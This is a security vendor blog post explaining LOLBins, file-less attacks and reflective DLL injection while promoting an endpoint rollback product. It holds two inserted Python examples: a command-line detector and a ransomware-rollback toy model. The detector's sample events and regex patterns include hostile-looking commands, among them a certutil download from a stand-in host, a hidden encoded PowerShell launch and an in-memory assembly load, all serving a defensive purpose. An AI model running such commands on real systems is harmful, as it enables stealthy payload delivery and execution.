Understanding LOLBins, File-less Attacks, and the Power of Activity Monitor

Reading time: 5 min

Published: 29/01/2024

Broderick Aquilino

Editor: Jason Sattler

Introduction

In the rapidly evolving landscape of cyber security, threats continue to advance, demanding innovative approaches to protect against them. Two such sophisticated techniques that have gained prominence in recent years are LOLBins and file-less attacks. Individually potent, their combination poses a formidable challenge to traditional security measures. In this blog, we will delve into the intricacies of LOLBins and file-less attacks, explore their synergy, and introduce an advanced solution, Activity Monitor, designed to counteract these threats effectively. 

LOLBins and File-less Attacks

LOLBins (living-off-the-land binaries) are legitimate, built-in system binaries or processes that attackers use to execute malicious activities. By leveraging these trusted applications, attackers can camouflage their actions, making it difficult for traditional security measures to detect and respond effectively. Examples include PowerShell, WMI (Windows Management Instrumentation), and CertUtil. These LOLBins are native to the Windows operating system, making them inconspicuous and allowing attackers to work undetected.

File-less attacks, on the other hand, represent a departure from conventional malware tactics. Unlike traditional attacks that involve the installation of malicious files on a system's disk, file-less attacks operate entirely in memory, leaving no trace on the disk for security measures to detect.

When LOLBins and file-less attacks join forces, they create a potent synergy that poses a serious threat to cyber security. By using known clean applications, often overlooked by Host-based Intrusion Prevention Systems (HIPS), attackers can operate discreetly within a system. The absence of a malicious file landing on the disk makes it challenging for antivirus solutions to catch the malicious activity in action.

To further enhance their evasion tactics, attackers often employ techniques like process injections. This involves injecting malicious code into legitimate processes, such as explorer.exe. This method allows them to exploit the legitimacy of the host process while executing malicious actions, such as encrypting user files.
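Because the binaries above are legitimate, detection has to look at how they are invoked rather than at what they are. The following is an added example (not part of the original post and not WithSecure code): a small Python detector that runs a few command-line heuristics for the three LOLBins named in the text over constructed Sysmon-style process-creation events in JSON-lines form. The rule patterns, labels and sample events are all constructed for illustration; the sample payload text is a placeholder.

```python
import json
import re
from pathlib import PureWindowsPath

# Heuristics per LOLBin, keyed by the image file name. Patterns and
# labels are constructed for this example, not a vendor rule set.
LOLBIN_RULES = {
    "powershell.exe": [
        (r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?=\s)", "encoded command"),
        (r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b", "hidden window"),
        (r"(?i)frombase64string", "inline base64 decode"),
        (r"(?i)reflection\.assembly\W*load", "in-memory assembly load"),
    ],
    "certutil.exe": [
        (r"(?i)(?:^|\s)-urlcache\b", "remote fetch via certutil"),
        (r"(?i)(?:^|\s)-decode\b", "base64 decode via certutil"),
    ],
    "wmic.exe": [
        (r"(?i)\bprocess\s+call\s+create\b", "process launch via WMI"),
    ],
}

# Constructed Sysmon-like EventID 1 (process creation) records, one JSON object per line.
# Lines 2, 4 and 5 are benign administrative or user activity; 1, 3 and 6 should be flagged.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc <base64-omitted>"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/file.bin C:\\Users\\Public\\file.bin"}
{"EventID": 1, "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -verify C:\\certs\\server.cer"}
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"}
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -c [Reflection.Assembly]::Load([Convert]::FromBase64String('<base64-omitted>'))"}
"""


def image_name(path):
    """Lower-case file name of a Windows image path ('C:\\...\\powershell.exe' -> 'powershell.exe')."""
    return PureWindowsPath(path).name.lower()


def analyse_event(event):
    """Return the heuristic labels matched by one process-creation event (empty list if none)."""
    rules = LOLBIN_RULES.get(image_name(event.get("Image", "")), [])
    cmdline = event.get("CommandLine", "")
    return [label for pattern, label in rules if re.search(pattern, cmdline)]


def detect(jsonl_text):
    """Run the heuristics over JSON-lines events; return one finding per flagged process creation."""
    findings = []
    for line in jsonl_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("EventID") != 1:  # only process-creation events carry a command line here
            continue
        reasons = analyse_event(event)
        if reasons:
            findings.append({
                "image": image_name(event["Image"]),
                "parent": image_name(event.get("ParentImage", "")),
                "reasons": reasons,
                "command_line": event["CommandLine"],
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding['parent']} -> {finding['image']}: {', '.join(finding['reasons'])}")
        print(f"    {finding['command_line']}")
```

The benign events show why the image name alone is not a usable signal: `certutil.exe -verify` and a signed inventory script both run the same trusted binaries as the flagged events. Real deployments pair command-line heuristics like these with parent-process context and, for the in-memory case the post goes on to describe, with monitoring of what the process does after it starts.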

Activity Monitor

In our earlier blog post, we unveiled an advanced feature within WithSecure Elements Endpoint Protection called WithSecure Rollback. This functionality harnesses the power of our Activity Monitor technology, enabling users to effortlessly restore their devices to their original files and settings in the aftermath of a malware attack. While initially conceived to exclusively monitor unknown applications, we have taken this defence strategy a step further. Activity Monitor has now been enhanced to counteract advanced threats, such as LOLBins, file-less attacks, and process injections.

To highlight the advanced capabilities of the Activity Monitor, we have prepared a demonstration that simulates an attack by a Netwalker ransomware strain. In this case, Netwalker is represented by a PowerShell command containing an embedded DLL. This DLL, responsible for encrypting users' files, is dynamically loaded into the explorer.exe process using reflective loading.

Reflective loading is a technique to inject code into a target process without relying on traditional loading mechanisms. Unlike typical loading methods, such as dynamic linking or process hollowing, reflective loading allows the malicious code to be loaded directly from memory. This method enhances the stealth and evasiveness of the attack, as it doesn't involve the usual file-based loading processes that can be easily detected by security tools.

The demo illustrates how Activity Monitor not only identifies and rolls back malicious activities but also distinguishes between files created by users and modifications made by the ransomware within the same explorer.exe process. This level of intelligence is crucial in preventing data loss and system compromise.
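The design property described here, undoing the ransomware's writes without undoing the user's, comes down to two things: journaling the pre-image of every modification, and attributing each modification to something finer than the process that issued it. The following is an added example (not part of the original post and not how WithSecure Rollback is implemented): a constructed in-memory model in which each write is tagged with the origin of the code that issued it, here simplified to whether that code was mapped from an image on disk or lived in unbacked memory, as a reflectively loaded DLL would. Both actors run inside the same `explorer.exe` process, and rollback is selective by origin. All paths, contents and process details are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Write:
    """One journaled file modification."""
    path: str
    process: str                 # process that issued the write (same for both actors below)
    origin: str                  # "image-backed" (code mapped from a file on disk) or "unbacked" (anonymous memory)
    pre_image: Optional[bytes]   # content before the write; None means the file did not exist


class MonitoredFs:
    """Toy file store whose writes are journaled with pre-images and an origin tag."""

    def __init__(self):
        self.files: Dict[str, bytes] = {}
        self.journal: List[Write] = []

    def write(self, path: str, data: bytes, process: str, origin: str) -> None:
        # Capture the pre-image before the change lands, so the write can later be undone.
        self.journal.append(Write(path, process, origin, self.files.get(path)))
        self.files[path] = data

    def rollback(self, origin: str) -> int:
        """Undo every write issued from `origin`, newest first; writes from other origins are kept."""
        undone = 0
        for w in reversed(self.journal):
            if w.origin != origin:
                continue
            if w.pre_image is None:
                self.files.pop(w.path, None)       # file was created by the actor: remove it
            else:
                self.files[w.path] = w.pre_image   # file was modified by the actor: restore it
            undone += 1
        self.journal = [w for w in self.journal if w.origin != origin]
        return undone


def run_scenario() -> Tuple[MonitoredFs, int]:
    """Constructed scenario: user and injected code both write from explorer.exe; roll back only the latter."""
    fs = MonitoredFs()
    proc = "explorer.exe (pid 4242)"
    docs = r"C:\Users\alice\Documents"

    # User activity: code mapped from explorer.exe's own image creates two documents.
    fs.write(rf"{docs}\report.docx", b"quarterly report", proc, "image-backed")
    fs.write(rf"{docs}\notes.txt", b"meeting notes", proc, "image-backed")

    # Injected code in the same process (unbacked memory) overwrites a document and drops a note.
    fs.write(rf"{docs}\report.docx", b"ENCRYPTED:7f3a...", proc, "unbacked")
    fs.write(rf"{docs}\README.txt", b"your files have been encrypted", proc, "unbacked")

    # The user keeps working after the encryption; this file must survive the rollback.
    fs.write(rf"{docs}\todo.txt", b"buy milk", proc, "image-backed")

    undone = fs.rollback("unbacked")
    return fs, undone


if __name__ == "__main__":
    fs, undone = run_scenario()
    print(f"undid {undone} writes; surviving files:")
    for path, content in sorted(fs.files.items()):
        print(f"  {path}: {content!r}")
```

The model deliberately leaves out the hard part, which is deciding the `origin` tag reliably at write time; in the toy it is supplied by the caller. It also shows the limitation of pre-image rollback: if the user had edited `report.docx` after it was encrypted, undoing only the ransomware write would restore the pre-encryption content and discard that later edit, so a real product has to decide how to surface such conflicts rather than silently pick one side.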

Conclusions

As cyber threats evolve, so must our defence mechanisms. LOLBins, file-less attacks, and process injections represent the new frontier of cyber warfare, requiring innovative solutions to ensure the security of digital environments. With Activity Monitor, organizations can fortify their defences, providing a proactive and intelligent shield against even the most sophisticated adversaries.

Activity Monitor is part of TRUST AWARE, a project funded by the European Union's Horizon 2020 research and innovation program grant agreement 101021377.
